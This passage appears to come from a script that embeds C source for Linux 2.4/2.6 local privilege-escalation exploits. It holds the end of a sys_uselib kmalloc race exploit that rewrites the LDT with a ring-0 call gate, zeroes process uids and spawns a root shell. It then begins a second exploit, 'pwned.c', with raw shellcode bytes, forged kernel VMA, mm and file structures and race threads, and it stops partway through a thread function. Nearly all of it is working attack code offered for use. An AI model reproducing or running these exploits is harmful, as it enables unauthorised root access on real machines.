		printf(\\\"\\\\n[+] race won maps=%d\\\", map_count); fflush(stdout);
		kill(consume_pid, SIGKILL);
		_exit(0);
	}

return 0;
}


int callme_1()
{
	return val++;
}


inline int valid_ptr(unsigned ptr)
{
	return ptr>=task_size && ptr<addr_min-16;
}


inline int validate_vma(unsigned *p, unsigned s, unsigned e)
{
unsigned *t;

	if(valid_ptr(p[0]) && valid_ptr(p[3]) && p[1]==s && p[2]==e) {
		t=(unsigned*)p[3];
		if( t[0]==p[0] && t[1]<=task_size && t[2]<=task_size )
			return 1;
	}
	return 0;
}


asmlinkage void kernel_code(unsigned *task)
{
unsigned *addr = task;

//	find & reset uids
	while(addr[0] != uid || addr[1] != uid ||
	      addr[2] != uid || addr[3] != uid)
		addr++;

	addr[0] = addr[1] = addr[2] = addr[3] = 0;
	addr[4] = addr[5] = addr[6] = addr[7] = 0;

//	find & correct VMA
	for(addr=(unsigned *)task_size; (unsigned)addr<addr_min-16; addr++) {
		if( validate_vma(addr, vma_start, vma_end) ) {
			addr[1] = task_size - PAGE_SIZE;
			addr[2] = task_size;
			break;
		}
	}
}


void kcode(void);

//	CPL0 code mostly stolen from cliph
void __kcode(void)
{
asm(
	\\\"kcode:						\\\\n\\\"
	\\\"	pusha					\\\\n\\\"
	\\\"	pushl	%es				\\\\n\\\"
	\\\"	pushl	%ds				\\\\n\\\"
	\\\"	movl	$(\\\" xstr(SEL_LDS) \\\") ,%edx	\\\\n\\\"
	\\\"	movl	%edx,%es			\\\\n\\\"
	\\\"	movl	%edx,%ds			\\\\n\\\"
	\\\"	movl	$0xffffe000,%eax		\\\\n\\\"
	\\\"	andl	%esp,%eax			\\\\n\\\"
	\\\"	pushl	%eax				\\\\n\\\"
	\\\"	call	kernel_code			\\\\n\\\"
	\\\"	addl	$4, %esp			\\\\n\\\"
	\\\"	popl	%ds				\\\\n\\\"
	\\\"	popl	%es				\\\\n\\\"
	\\\"	popa					\\\\n\\\"
	\\\"	lret					\\\\n\\\"
    );
}


int callme_2()
{
	return val + task_size + addr_min;
}


void sigfailed(int v)
{
	ccnt++;
	fatal(\\\"lcall\\\", 1);
}


//	modify LDT & exec
void try_to_exploit(unsigned addr)
{
volatile int r, *v;

	printf(\\\"\\\\n[!] try to exploit 0x%.8x\\\", addr); fflush(stdout);
	unlink(libname);

	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);
	if(r) fatal(\\\"mprotect 1\\\", 1);

//	check if really LDT
	v = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );
	signal(SIGSEGV, sigfailed);
	r = *v;
	if(r != MAGIC) {
		printf(\\\"\\\\n[-] FAILED val = 0x%.8x\\\", r); fflush(stdout);
		fatal(\\\"find LDT\\\", 1);
	}

//	yeah, setup CPL0 gate
	v[0] = ((unsigned)(SEL_LCS)<<16) | ((unsigned)kcode & 0xffffU);
	v[1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
	printf(\\\"\\\\n[+] gate modified ( 0x%.8x 0x%.8x )\\\", v[0], v[1]); fflush(stdout);

//	setup CPL0 segment descriptors (we need the \\\'accessed\\\' versions ;-)
	v = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );
	v[0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */
	v[1] = 0x00cf9b00;

	v = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );
	v[0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */
	v[1] = 0x00cf9300;

//	reprotect to get only one big VMA
	r = sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);
	if(r) fatal(\\\"mprotect 2\\\", 1);

//	CPL0 transition
	sys_sched_yield();
	val = callme_1() + callme_2();
	asm(\\\"lcall $\\\" xstr(SEL_GATE) \\\",$0x0\\\");
	//if( getuid()==0 || (val==31337 && strlen(hellc0de)==31337) ) {
	if (getuid()==0) {
		printf(\\\"\\\\n[+] exploited, uid=0\\\\n\\\\n\\\" ); fflush(stdout);
	} else {
		printf(\\\"\\\\n[-] uid change failed\\\" ); fflush(stdout);
		sigfailed(0);
	}
	signal(SIGTERM, SIG_IGN);
	kill(0, SIGTERM);
	setresuid(0, 0, 0);
	execl(shellname, \\\"sh\\\", NULL);
	fatal(\\\"execl\\\", 0);
}


void scan_mm_finish();
void scan_mm_start();


//	kernel page table scan code
void scan_mm()
{
	map_addr -= PAGE_SIZE;
	if(map_addr <= (unsigned)addr_min)
		scan_mm_start();

	scnt=0;
	val = *(int*)map_addr;
	scan_mm_finish();
}


void scan_mm_finish()
{
retry:
	__asm__(\\\"movl	%0, %%esp\\\" : :\\\"m\\\"(old_esp) );

	if(scnt) {
		pagemap[pidx] ^= 1;
	}
	else {
		sys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);
	}
	pidx--;
	scan_mm();
	goto retry;
}


//	make kernel page maps before and after allocating LDT
void scan_mm_start()
{
static int npg=0;
static struct modify_ldt_ldt_s l;
//static struct user_desc l;
	pnum++;
	if(pnum==1) {
		pidx = max_page-1;
	}
	else if(pnum==2) {
		memset(&l, 0, sizeof(l));
		l.entry_number = LDT_ENTRIES-1;
		l.seg_32bit = 1;
		l.base_addr = MAGIC >> 16;
		l.limit = MAGIC & 0xffff;
		l.limit_in_pages = 1;
		if( modify_ldt(1, &l, sizeof(l)) != 0 )
			fatal(\\\"modify_ldt\\\", 1);
		pidx = max_page-1;
	}
	else if(pnum==3) {
		npg=0;
		for(pidx=0; pidx<=max_page-1; pidx++) {
			if(pagemap[pidx]) {
				npg++;
			}
			else if(npg == LDT_PAGES) {
				npg=0;
				try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
			} else {
				npg=0;
			}
		}
		fatal(\\\"find LDT\\\", 1);
	}

//	save context & scan page table
	__asm__(\\\"movl	%%esp, %0\\\" : :\\\"m\\\"(old_esp) );
	map_addr = addr_max;
	scan_mm();
}


//	return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;
char x1[20];

	fp = fopen(\\\"/proc/slabinfo\\\", \\\"r\\\");
	if(!fp)
		fatal(\\\"get_slab_objs: fopen\\\", 0);
	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a = -1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
		c = sscanf(line, \\\"%s %u %u %u %u %u %u\\\", name, &u, &a,
			   &d, &d, &d, &d);
	} while (strcmp(name, sn));
	close(fileno(fp));
	fclose(fp);
	return c == 7 ? a - u : -1;
}

long memmaped_size = 0;

//	leave one object in the SLAB
inline void prepare_slab()
{
int *r;

	map_addr -= PAGE_SIZE;
	map_count++;
	map_flags ^= PROT_READ;
		
	r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
			     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
	if(MAP_FAILED == r) {
		printf(\\\"--> prepare_slab(), %dMb\\\\n\\\", memmaped_size/1024/1024);
		fatal(\\\"try again\\\", 0);
	}
	memmaped_size += PAGE_SIZE;
	*r = map_addr;
}


//	sig handlers
void segvcnt(int v)
{
	scnt++;
	scan_mm_finish();
}


//	child reap
void reaper(int v)
{
	ccnt++;
	waitpid(0, &v, WNOHANG|WUNTRACED);
}


//	sometimes I get the VMAs in reversed order...
//	so just use anyone of the two but take care about the flags
void check_vma_flags();

void vreversed(int v)
{
	map_flags = 0;
	check_vma_flags();
}


void check_vma_flags()
{
	if(map_flags) {
		__asm__(\\\"movl	%%esp, %0\\\" : :\\\"m\\\"(old_esp) );
	} else {
		__asm__(\\\"movl	%0, %%esp\\\" : :\\\"m\\\"(old_esp) );
		goto out;
	}
	signal(SIGSEGV, vreversed);
	val = * (unsigned*)(lib_addr + PAGE_SIZE);
out:
}


//	use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]=\\\"-\\\\\\\\|/-\\\\\\\\|/\\\";

//	printf(\\\"\\\\n    cat /proc/%d/maps\\\", getpid() ); fflush(stdout);
//	helper clone
	finish=0; ccnt=0;
	sz = sizeof(cstack) / sizeof(cstack[0]);
	cpid = clone(&raceme, (void*) &cstack[sz-16],
			CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
	if(-1==cpid) fatal(\\\"clone\\\", 0);

//	synchronize threads
	while(!finish) sys_sched_yield();
	finish=0;
	if(!silent) {
		printf(\\\"\\\\n\\\"); fflush(stdout);
	}

//	try to hit the kmalloc race
	for(;;) {

		r = get_slab_objs(\\\"vm_area_struct\\\");
		//printf(\\\"\\\\nfree slab = %d\\\\n\\\",r);
		while(r != 1 && r > 0) {
			prepare_slab();
			r--;
		}

		sys_gettimeofday(&tm1, NULL);
		go = 1;
		r=sys_uselib(libname);
		go = 0;
		if(r) fatal(\\\"uselib\\\", 0);
		if(finish) break;

//	wipe lib VMAs and try again
		r = sys_munmap(lib_addr, LIB_SIZE);
		if(r) fatal(\\\"munmap lib\\\", 0);
		if(ccnt) goto failed;

		if( !silent && !(pcnt%64) ) {
			printf(\\\"\\\\r    Wait... %c\\\", smiley[ (pcnt/64)%8 ]);
			fflush(stdout);
		}
		pcnt++;
	}

//	seems we raced, free mem
	r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);
	if(r) fatal(\\\"munmap 1\\\", 0);
	r = sys_munmap(lib_addr, PAGE_SIZE);
	if(r) fatal(\\\"munmap 2\\\", 0);
	
//	relax kswapd
	sys_gettimeofday(&tm1, NULL);
	for(;;) {
		sys_sched_yield();
		sys_gettimeofday(&tm2, NULL);
		delta = tmdiff(&tm1, &tm2);
		if( wtime*1000000U <= (unsigned)delta ) break;
	}

//	we need to check the PROT_EXEC flag
	map_flags = PROT_EXEC;
	check_vma_flags();
	if(!map_flags) {
		printf(\\\"\\\\n    VMAs reversed\\\"); fflush(stdout);
	}

//	write protect brk\\\'s VMA to fool vm_enough_memory()
	r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,
			 PROT_READ|map_flags);
	if(-1==r) { fatal(\\\"mprotect brk\\\", 0); }

//	this will finally make the big VMA...
	sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;
expand:
	r = sys_madvise((void*)(lib_addr + PAGE_SIZE),
			LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
	if(r) fatal(\\\"madvise\\\", 0);
	r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,
			PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);
	if(-1==r) {
		if(0==sz) {
			fatal(\\\"mremap: expand VMA\\\", 0);
		} else {
			sz -= PAGE_SIZE;
			goto expand;
		}
	}
	vma_start = lib_addr + PAGE_SIZE;
	vma_end = vma_start + sz + 2*PAGE_SIZE;
	printf(\\\"\\\\n    expanded VMA (0x%.8x-0x%.8x)\\\", vma_start, vma_end);
	fflush(stdout);

//	try to figure kernel layout
	signal(SIGCHLD, reaper);
	signal(SIGSEGV, segvcnt);
	signal(SIGBUS, segvcnt);
	scan_mm_start();

failed:
	printf(\\\"failed:\\\\n\\\");
	fatal(\\\"try again\\\", 0);

}


//	make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;

//	make our elf library
	umask(022);
	unlink(libname);
	fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);
	if(fd<0) fatal(\\\"open lib (\\\"LIBNAME\\\" not writable?)\\\", 0);
	memset(&eh, 0, sizeof(eh) );

//	elf exec header
	memcpy(eh.e_ident, ELFMAG, SELFMAG);
	eh.e_type = ET_EXEC;
	eh.e_machine = EM_386;
	eh.e_phentsize = sizeof(struct elf_phdr);
	eh.e_phnum = 1;
	eh.e_phoff = sizeof(eh);
	write(fd, &eh, sizeof(eh) );

//	section header:
	memset(&eph, 0, sizeof(eph) );
	eph.p_type = PT_LOAD;
	eph.p_offset = 4096;
	eph.p_filesz = 4096;
	eph.p_vaddr = lib_addr;
	eph.p_memsz = LIB_SIZE;
	eph.p_flags = PF_W|PF_R|PF_X;
	write(fd, &eph, sizeof(eph) );

//	execable code
	lseek(fd, 4096, SEEK_SET);
	memset(tmpbuf, 0x90, sizeof(tmpbuf) );
	write(fd, &tmpbuf, sizeof(tmpbuf) );
	close(fd);
}


//	move stack down #2
void prepare_finish()
{
int r;
static struct sysinfo si;

	old_esp &= ~(PAGE_SIZE-1);
	old_esp -= PAGE_SIZE;
	task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
	r = sys_munmap(old_esp, task_size-old_esp);
	if(r) fatal(\\\"unmap stack\\\", 0);

//	setup rt env
	uid = getuid();
	lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
	if(map_base)
		map_addr = map_base;
	else
		map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
	printf(\\\"\\\\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x\\\",
		old_esp, task_size, map_base); fflush(stdout);

//	check physical mem & prepare
	sysinfo(&si);
	addr_min = task_size + si.totalram;
	addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);
	addr_max = addr_min + si.totalram;
	if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min)
		addr_max = 0xffffd000;

	printf(\\\"\\\\n[+] vmalloc area 0x%.8x - 0x%.8x\\\", addr_min, addr_max);
	max_page = (addr_max - addr_min) / PAGE_SIZE;
	pagemap = malloc( max_page + 32 );
	if(!pagemap) fatal(\\\"malloc pagemap\\\", 1);
	memset(pagemap, 0, max_page + 32);

//	go go
	make_lib();
	exploitme();
}


//	move stack down #1
void prepare()
{
unsigned p=0;

	environ = myenv;

	p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
		       MAP_PRIVATE|MAP_ANONYMOUS, 0, 0	);
	if(-1==p) fatal(\\\"mmap2 stack\\\", 0);
	p += STACK_SIZE - 64;

	__asm__(\\\"movl	%%esp, %0	\\\\n\\\"
		\\\"movl 	%1, %%esp	\\\\n\\\"
		: : \\\"m\\\"(old_esp), \\\"m\\\"(p)
	);

	prepare_finish();
}


void chldcnt(int v)
{
	ccnt++;
}


//	alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;

	__asm__(\\\"movl	%%esp, %0\\\" : : \\\"m\\\"(old_esp) );

	old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
	old_esp = map_base? map_base : old_esp;

	for(;;) {
		if(left<=0)
			left = get_slab_objs(\\\"vm_area_struct\\\");
		if(left <= SLAB_THRSH)
			break;
		left--;

		map_flags ^= PROT_READ;
		old_esp -= PAGE_SIZE;
		r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
			MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
		if(MAP_FAILED == r)
			break;

		if(c>SLAB_PER_CHLD)
			break;
		if( (c%1024)==0 ) {
			if(!c) printf(\\\"\\\\n\\\");
			printf(\\\"\\\\r    child %d VMAs %d\\\", val, c);
			fflush(stdout);
		}
		c++;
	}
	printf(\\\"\\\\r    child %d VMAs %d\\\", val, c);
	fflush(stdout);
	kill(getppid(), SIGUSR1);
	for(;;) pause();
}


//	empty SLAB caches
void wipe_slab()
{
	signal(SIGUSR1, chldcnt);
	printf(\\\"\\\\n[+] SLAB cleanup\\\"); fflush(stdout);
	for(;;) {
		ccnt=0;
		val++;
		cpid = fork();
		if(!cpid)
			do_wipe();

		while(!ccnt) sys_sched_yield();
		if( get_slab_objs(\\\"vm_area_struct\\\") <= SLAB_THRSH )
			break;
	}
	signal(SIGUSR1, SIG_DFL);
}


void usage(char *n)
{
	printf(\\\"\\\\nUsage: %s\\\\t-f forced stop\\\\n\\\", n);
	printf(\\\"\\\\t\\\\t-s silent mode\\\\n\\\");
	printf(\\\"\\\\t\\\\t-c command to run\\\\n\\\");
	printf(\\\"\\\\t\\\\t-n SMP iterations\\\\n\\\");
	printf(\\\"\\\\t\\\\t-d race delta us\\\\n\\\");
	printf(\\\"\\\\t\\\\t-w wait time seconds\\\\n\\\");
	printf(\\\"\\\\t\\\\t-l alternate lib name\\\\n\\\");
	printf(\\\"\\\\t\\\\t-a alternate addr hex\\\\n\\\");
	printf(\\\"\\\\n\\\");
	_exit(1);
}


//	give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;

	while(ac) {
		r = getopt(ac, av, \\\"n:l:a:w:c:d:fsh\\\");
		if(r<0) break;

		switch(r) {

		case \\\'f\\\' :
			fstop = 1;
			break;

		case \\\'s\\\' :
			silent = 1;
			break;

		case \\\'n\\\' :
			smp_max = atoi(optarg);
			break;

		case \\\'d\\\':
			if(1!=sscanf(optarg, \\\"%u\\\", &delta_max) || delta_max > 100000u )
				fatal(\\\"bad delta value\\\", 0);
			break;

		case \\\'w\\\' :
			wtime = atoi(optarg);
			if(wtime<0) fatal(\\\"bad wait value\\\", 0);
			break;

		case \\\'l\\\' :
			libname = strdup(optarg);
			break;

		case \\\'c\\\' :
			shellname = strdup(optarg);
			break;

		case \\\'a\\\' :
			if(1!=sscanf(optarg, \\\"%x\\\", &map_base))
				fatal(\\\"bad addr value\\\", 0);
			map_base &= ~(PGD_SIZE-1);
			break;

		case \\\'h\\\' :
		default:
			usage(av[0]);
			break;
		}
	}
	consume_pid = fork();
	
	if (consume_pid == 0)
	{
		consume_memory();
		pause();
		return 0;
	}
//	basic setup
	uid = getuid();
	setpgrp();
	wipe_slab();
	prepare();

return 0;
}
");
$two_four[2] = base64_decode("/*
* pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. PRIVATE.
* it\\\'s not the best one, the ldt approach is definitively better.
* discovered may 2004. no longer private because lorian/cliph/ihaquer
* can lick my balls.
* (c) 2004 sd <sd@fucksheep.org>
* requieres cca 1gb on fs.
*/


/*
* first create fake vma structs.
*
*
* let\\\'s have 3 threads, t1, t2 and t3.
* t1 and t2 have common vm.
*
* t3:
* - wait4sig (will come back from t2)
* - write(fd3, bigmem, bigfile_size)
* - exit()
* t1:
* - fd3 = empty file
* - fd1 = bigfile, writing it took 16 secs
* - bigmem = mmap(NULL, bigfile_size, fd1, 0);
* - t3 = fork()
* - t2 = clone()
* - fd2 = munmap_file, size of ram.
* - mumem = mmap(NULL, munmap_file_size, fd2)
* - mmap(mumem, 4096, ANONYMOUS) // for extending do_brk check
* - mmap lots of vmas
* - close(fd2);
* - create evil lib
* - free lot of vmas
* - sig @ t2
* - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096);
* - sem = 1
* - waitpid
* t2:
* - wait4sig
* - sleep(100msec)
* - mmap(mumem, fd3, 4096) // this is being protected by i_sem !
* - sendsig @ t3
* - sleep(100msec)
* - if (sem) error
* - msync(mumem, 8192) - will wait for write() to finish. munmap finishes by that
* time
* - if (!sem) error
* - if it does return we failed, otherwise shell.
*
*/

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <time.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <linux/fcntl.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <linux/elf.h>



#define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */

#define ltime unsigned long long
#define MEMSZ (70*1024*1024)

#define MAGIC -123

unsigned char shellcode[] =
\\\"\\\\x60\\\\xe8\\\\x5f\\\\x00\\\\x00\\\\x00\\\\x30\\\\x03\\\\x98\\\\x19\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x50\\\\x52\\\\x49\\\\x56\\\\x41\\\\x54\\\\x45\\\\x2a\\\\x6b\\\\x65\\\\x72\\\\x6e\\\\x65\\\\x6c\\\\x20\\\\x63\\\\x61\\\\x70\\\\x20
\\\\x73\\\\x68\\\\x65\\\\x6c\\\\x6c\\\\x63\\\\x6f\\\\x64\\\\x65\\\\x2c\\\\x20\\\\x28\\\\x63\\\\x29\\\\x20\\\\x32\\\\x30\\\\x30\\\\x34
\\\\x20\\\\x3c\\\\x73\\\\x64\\\\x40\\\\x68\\\\x79\\\\x73\\\\x74\\\\x65\\\\x72\\\\x69\\\\x61\\\\x2e\\\\x73\\\\x6b\\\\x3e\\\\x2a\\\\x50
\\\\x52\\\\x49\\\\x56\\\\x41\\\\x54\\\\x45\\\\x5b\\\\xbd\\\\x00\\\\xe0\\\\xff\\\\xff\\\\x21\\\\xe5\\\\x81\\\\x7d\\\\x00\\\\x00\\\\x00
\\\\x00\\\\xc0\\\\x72\\\\x03\\\\x8b\\\\x6d\\\\x00\\\\x8d\\\\x4b\\\\x08\\\\xb8\\\\xb8\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x8b\\\\x11
\\\\x8b\\\\x71\\\\x04\\\\x8b\\\\x79\\\\x08\\\\x83\\\\xc5\\\\x04\\\\x39\\\\x55\\\\x00\\\\x75\\\\xf8\\\\x39\\\\x7d\\\\x04\\\\x75\\\\xf3
\\\\x39\\\\x75\\\\x08\\\\x75\\\\xee\\\\x31\\\\xc0\\\\x48\\\\x89\\\\x45\\\\x00\\\\x89\\\\x45\\\\x04\\\\x89\\\\x45\\\\x08\\\\xb8\\\\xb8
\\\\x00\\\\x00\\\\x00\\\\x8d\\\\x4b\\\\x14\\\\xcd\\\\x80\\\\xff\\\\x41\\\\x04\\\\x74\\\\x0b\\\\x89\\\\x55\\\\x00\\\\x89\\\\x7d\\\\x04
\\\\x89\\\\x75\\\\x08\\\\xeb\\\\xc8\\\\x61\\\\xb8\\\\x85\\\\xff\\\\xff\\\\xff\\\\xc3\\\";

static ltime gtime()
{
struct timeval tv;
gettimeofday(&tv, NULL);
return tv.tv_sec * 1000000 + tv.tv_usec;
}

ltime lt;

static void time_start()
{
lt = gtime();
}

static void time_end()
{
printf(\\\"took %lu microseconds\\\\n\\\", gtime() - lt);
}

void core_stat()
{
int s;
char buf[512];
char incore;
unsigned long last = 0;
FILE *f;

sprintf(buf, \\\"/proc/%d/maps\\\", getpid());
f = fopen(buf, \\\"rt\\\");
while (fgets(buf, 512, f)) {
unsigned int from, to;
unsigned int i;

if (sscanf(buf, \\\"%x-%x\\\", &from, &to) < 2)
break;
// printf(\\\"%p!%p\\\\n\\\", from, to);
for (i = from; i < to; i += PAGE_SIZE) {
mincore((void *) i, PAGE_SIZE, &incore);
if (incore) {
r:;
if (!last) {
printf(\\\"in core 0x%08x-\\\", i);
s = last = i;
continue;
}
if (last + PAGE_SIZE == i) {
// printf(\\\"(%p)\\\", i);
last = i;
continue;
}
printf(\\\"0x%08x (%d)\\\\n\\\", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
goto r;
}
if (!last)
continue;
printf(\\\"0x%08x (%d)\\\\n\\\", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
}
}
fclose(f);
}


#define SWAPFILE \\\"TTswap\\\"
#define EATFILES \\\"TTeatfiles\\\"
#define EATFILE \\\"TTeatfile\\\"
#define SHAREFILE \\\"TTsharefile\\\"
#define DUMMYFILE \\\"TTdummyfile\\\"
#define EATTIME 10
#define LIBFILE \\\"TTlib\\\"

/* number of vma struct fill */
#define VMAFILL 15000 

/* how much pages to sync - 2 is enough */
#define NSYNC 2
#define BASE (char *) 0x60000000
#define DBASE (char *) 0x80001000
#define EPAGE (char *) 0x80000000

#define MAPSTEP 64 * 4096

#if 1
#define DEBUG(x...) { printf(\\\"%s():\\\", __func__); printf(x); printf(\\\"\\\\n\\\"); }
#else
#define DEBUG(x...)
#endif

#define sendsig(pid) kill(pid, SIGUSR1)
#define wait4sig() { while (!gotsig) pause(); gotsig = 0; }

#define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1))
#define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1))

#undef O_DIRECT
#define O_DIRECT 0

struct libimg {
Elf32_Ehdr elf;
Elf32_Phdr ph;
};


struct dentry_struct {
unsigned dummy0, dummy1;
void *inode1, *inode2;
};

struct file_struct {
struct file_struct *next, *prev;
void *dentry;
void *mnt;
void *op;
void *f_mapping[64]; /* somewhere in there is f_mapping on 2.6 */
};

/* this should roughly cover 2.4* and 2.6* */
struct vma_struct {
void *mm;
unsigned long vm_start;
unsigned long vm_end;
struct vma_struct *vm_next;
unsigned long pgprot;
unsigned long vmflags;
char rb[16];
void *shared_next, *shared_prev;
void *vm_ops;
unsigned long pgoff;
void *file;
void *priv;
};

struct mm_struct {
struct vma_struct *mmap;
void *rb;
struct vma_struct *cache;
void *pgd1;
void *pgd2;
void *pgd3;
/* somewhere there lies the spinlock */
unsigned long locks[32];
};


/* the image of the evil library. */
struct libimg limg = {
{
e_ident: \\\"\\\\177ELF\\\",
e_type: ET_EXEC,
e_machine: EM_386,
e_phoff: sizeof(Elf32_Ehdr),
e_ehsize: sizeof(Elf32_Ehdr),
e_phentsize: sizeof(Elf32_Phdr),
e_phnum: 1
},
{
p_type: PT_LOAD,
p_vaddr: 0,
p_memsz: 0
}
};

static void make_lib(char *name)
{
int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700);
write(libfd, &limg, sizeof(limg));
fchmod(libfd, 0700);
}


static char thread_stack[16384];
int fd1, fd2, fd3;
char buf[MAPSTEP];
int notincore;
int t4;
int t3;
int t2;
int bigsize = 0;
char *bigmem = NULL;
int swapsize = 0;
char *swapmem = NULL;
char *base = BASE;
char *vmamem;
int gotsig = 0;
int sem = 0;

#define cleanup() _cleanup(__func__, __LINE__)
void killall()
{
if (t2 != getpid())
kill(t2, SIGKILL);
if (t3 != getpid())
kill(t3, SIGKILL);
if (t4 != getpid())
kill(t4, SIGKILL);
}
void _cleanup(const char *name, int line)
{
printf(\\\"cleanup called! from %s:%d\\\\n\\\", name, line);
killall();
unlink(SHAREFILE);
unlink(SWAPFILE);
unlink(EATFILES);
unlink(EATFILE);
unlink(LIBFILE);
_exit(1);
}


#define FAKES_BASE 0x50000000

struct fakes {
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
unsigned long mapping24[128];
unsigned long mapping26[128];
unsigned long inode[128];
unsigned long pgd[1024];
void *ptrs[128];
char shellcode[sizeof(shellcode)];
int t2;
};

struct fakes *fakes = (void *) FAKES_BASE;


/* build the fake vma which msync_interval will get
* we\\\'ve to emulate a lot of things!
*/
void build_fakevma()
{
int i;
memset(fakes, 0, sizeof(*fakes));
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
/* we need this to let the kernel enter the fs callback we control */
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;

fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
/* there are no pmd\\\'s */
memset(fakes->pgd, 0, sizeof(fakes->pgd));
/* initialize potential spinlock on smp */
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
/* 2.4 goes thru dentry */
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
/* this will be i_sem */
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
/* and this reference to i_mapping */
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;

/* 2.6 goes thru f_mapping */
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;

/* prepare mmappings for both 2.4 and 2.6 */

/* mapping on 2.6 requieres to have ->host defined.
and backing_dev_info pointing to bunch of nonzero memory.
also locked_pages list must point to itself (empty) */
fakes->mapping26[0] = (unsigned long) fakes->inode;
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;

/* mapping on 2.4 requieres only having mapping consisting of empty lists */
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;

/* ok, now setup fops->f_sync to our evil fsync */
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}

void create_fakepage(void *buf)
{
int i;
void *vma = &fakes->vma;
void **p = buf;

for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma; /* !!! */
}


static void sighand(int d)
{
gotsig = 1;
}


static int thread(void *d)
{
int t3;
int ret;
int i;

wait4sig();
printf(\\\"(sleep1)\\\\n\\\");
usleep(300000);
printf(\\\"(sleep1 finished)\\\\n\\\");
printf(\\\"trying to mmap back the evil page\\\\n\\\");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap(swapmem + PAGE_SIZE * 2, PAGE_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
